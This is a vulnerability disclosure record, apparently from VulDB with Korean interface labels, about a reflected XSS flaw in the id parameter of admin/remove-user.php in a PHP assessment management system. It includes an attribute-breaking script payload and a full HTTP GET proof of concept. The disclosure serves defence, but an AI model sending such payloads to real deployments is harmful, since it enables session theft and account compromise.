| 제목 | Assessment Management System admin/remove-user.php Reflected XSS Vulnerability v1.0 Reflected XSS |
|---|
| 설명 | # Assessment Management System admin/remove-user.php Reflected XSS Vulnerability
A reflected cross-site scripting (XSS) vulnerability exists in the `admin/remove-user.php` file of the Assessment
Management System. The application reflects user-controlled input from the `id` parameter into an HTML attribute
without proper output encoding. As a result, an attacker can inject arbitrary JavaScript that executes in the
browser of a victim who visits a crafted URL.
##
## Impact of the Vulnerability
This vulnerability may allow an attacker to execute arbitrary JavaScript in the browser of a logged-in administrator
or other authenticated user. Successful exploitation may lead to session theft, unauthorized actions, sensitive
information disclosure, or account compromise within the application context.
##
## Payload
```
"><ScRiPt>alert(1)</sCrIpT>
```
"><ScRiPt>alert(1)</sCrIpT>
## Proof of Concept
Send the following request to the vulnerable endpoint:
```http
GET /admin/remove-user.php?id="><ScRiPt>alert(1)</sCrIpT> HTTP/1.1
Host: assessment
Cookie: PHPSESSID=f11os756ltsdgbtk776pklo8cs
```
The application reflects the `id` parameter into the `value` attribute of the Username field without HTML escaping:
```html
<input class="form-control" type="text" value="\"><ScRiPt>alert(1)</sCrIpT>" readonly>
```
The injected double quote closes the original `value` attribute, and the following `<script>` element is interpreted
by the browser as executable HTML/JavaScript. This confirms the presence of a reflected XSS vulnerability in
`admin/remove-user.php`.
##
## Source Download
```
[Assessment Management In PHP With Source Code - Source Code & Projects](https://code-projects.org/assessment-management-in-php-with-source-code/)
```
[Assessment Management In PHP With Source Code - Source Code & Projects]( |
|---|
| 원천 | ⚠️ https://github.com/zzzxc643/CVE1/blob/main/assessment/vul4.md |
|---|
| 사용자 | SSL_Seven_Security_Lab_WangZhiQiang_ZhanXiuChen (UID 97200) |
|---|
| 제출 | 2026. 06. 03. AM 07:07 (1 월 ago) |
|---|
| 모더레이션 | 2026. 07. 03. PM 08:50 (1 month later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 376170 [code-projects Assessment Management 1.0 /admin/remove-user.php 아이디 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 20 |
|---|